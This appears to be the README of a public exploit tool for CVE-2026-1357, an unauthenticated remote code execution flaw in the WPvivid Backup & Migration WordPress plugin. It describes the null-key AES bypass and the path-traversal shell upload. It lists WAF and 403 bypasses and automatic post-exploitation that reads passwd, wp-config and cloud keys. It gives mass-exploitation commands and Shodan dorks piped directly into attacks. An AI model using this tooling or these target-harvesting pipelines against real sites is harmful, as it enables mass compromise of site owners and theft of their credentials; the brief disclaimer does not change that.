Share
## https://sploitus.com/exploit?id=7267CD9E-8C27-5705-8A2C-2FCAEC7DE81F
# CVE-2026-1357 โ€” WPvivid Backup & Migration RCE

> **CVE Credit:** Lucas Montes (NiRoX)  
> **Tool By:** CyberTechAjju  
> **CVSS:** 9.8 (Critical) | **Affected:** โ‰ค 0.9.123 | **Patched:** 0.9.124

---

## โš ๏ธ Disclaimer

For **authorized security testing only**. Unauthorized access to systems is illegal.

---

## Overview

Unauthenticated RCE in WPvivid Backup & Migration via two chained bugs:

1. **Crypto Fail-Open** โ€” `openssl_private_decrypt()` returns `false` on bad key โ†’ `phpseclib` v1 treats it as null-byte AES key โ†’ attacker encrypts with 16 null bytes
2. **Path Traversal** โ€” unsanitized `name` field โ†’ `../uploads/shell.php` escapes backup dir

**Constraint:** Exploitable only when `wpvivid_api_token` is generated and not expired.

---

## Features

| Feature | Description |
|---------|-------------|
| ๐Ÿ” **Auto-Detection** | WordPress + WPvivid plugin + version fingerprinting |
| ๐Ÿ›ก๏ธ **WAF Bypass** | User-Agent rotation, header spoofing, encoding tricks |
| ๐Ÿ”“ **403 Bypass** | X-Forwarded-For, X-Original-URL, path normalization, double encoding |
| ๐Ÿ’€ **Auto-Exploit** | Null-key AES payload + path traversal upload |
| ๐Ÿ“‹ **Post-Exploit** | Auto-runs 20+ recon commands (id, whoami, passwd, wp-config, SUID, etc.) |
| ๐Ÿ”‘ **Data Extractor** | Greps DB creds, API keys, passwords, AWS keys from output |
| ๐Ÿ“Š **Report Gen** | Markdown PoC report with full exploitation evidence |
| โšก **Mass Scan** | Multi-threaded with proxy/Burp support |

---

## Install

```bash
git clone https://github.com/YOUR_USER/CVE-2026-1357-poc.git
cd CVE-2026-1357-poc
pip install -r requirements.txt
```

---

## Usage

```bash
# Scan only (detect WordPress + WPvivid + version)
python3 cve_2026_1357.py -u http://target.com

# Scan + Exploit + Auto Post-Exploitation
python3 cve_2026_1357.py -u http://target.com --exploit

# Exploit without post-exploitation recon
python3 cve_2026_1357.py -u http://target.com --exploit --no-post

# Mass scan with report
python3 cve_2026_1357.py -l targets.txt -t 20 --exploit --report

# Through Burp proxy
python3 cve_2026_1357.py -u http://target.com --exploit --proxy http://127.0.0.1:8080

# Payload-only mode
python3 cve_2026_1357.py -u http://x --payload-only
```

### All Options

```
-u, --url         Single target URL
-l, --list        File with URLs (one per line)
--exploit         Enable exploitation mode
--shell NAME      Shell filename (default: pwn_remote.php)
--no-post         Skip post-exploitation recon
--report          Generate markdown PoC report
--report-dir DIR  Report output directory
-t, --threads N   Concurrent threads (default: 5)
--timeout SECS    Request timeout (default: 10)
--proxy URL       HTTP proxy for Burp
--payload-only    Print base64 payload & exit
```



---

## Target Discovery (Dorks)

See **[dorks.md](dorks.md)** for full list. Quick ones:

```
# Shodan
http.html:"wpvivid-backuprestore"
http.html:"wpvivid" http.component:"WordPress"

# Google
inurl:"/wp-content/plugins/wpvivid-backuprestore/readme.txt"

# Pipeline
shodan search 'http.html:"wpvivid-backuprestore"' --fields ip_str,port --limit 500 \
  | awk '{print "http://"$1":"$2}' > targets.txt
python3 cve_2026_1357.py -l targets.txt -t 20 --exploit --report
```

---

## Files

```
CVE-2026-1357-poc/
โ”œโ”€โ”€ cve_2026_1357.py    โ† Main tool (scanner + exploiter + post-exploit)
โ”œโ”€โ”€ dorks.md            โ† Shodan/Google/Censys/FOFA/ZoomEye dorks
โ”œโ”€โ”€ requirements.txt    โ† Python dependencies
โ”œโ”€โ”€ .gitignore
โ””โ”€โ”€ README.md           โ† This file
```

---

## Credits

**Lucas Montes (NiRoX)** โ€” CVE Discovery  
**CyberTechAjju** โ€” Exploit Tooling